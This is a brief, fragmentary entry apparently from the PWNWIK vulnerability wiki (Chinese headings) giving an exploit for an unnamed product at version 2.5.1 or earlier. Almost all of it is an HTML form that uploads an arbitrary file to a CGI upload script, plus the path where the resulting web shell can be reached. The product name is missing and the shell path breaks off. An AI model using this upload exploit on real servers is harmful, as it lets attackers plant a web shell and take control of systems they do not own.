PWNWIK.COM
,
漏洞影响
Version: <=2.5.1
EXP
<form action="http://<target>/cgi-bin/up.cgi" method="post" enctype="multipart/form-data"> <input type="text" name="sid" value="joe"> <input type="file" name="file"> <input type="submit" value="Upload" name="submit"> </form> Shell : http://<target>/cgi-bin/temp/joe/she
免费、自由、人人可编辑的漏洞库
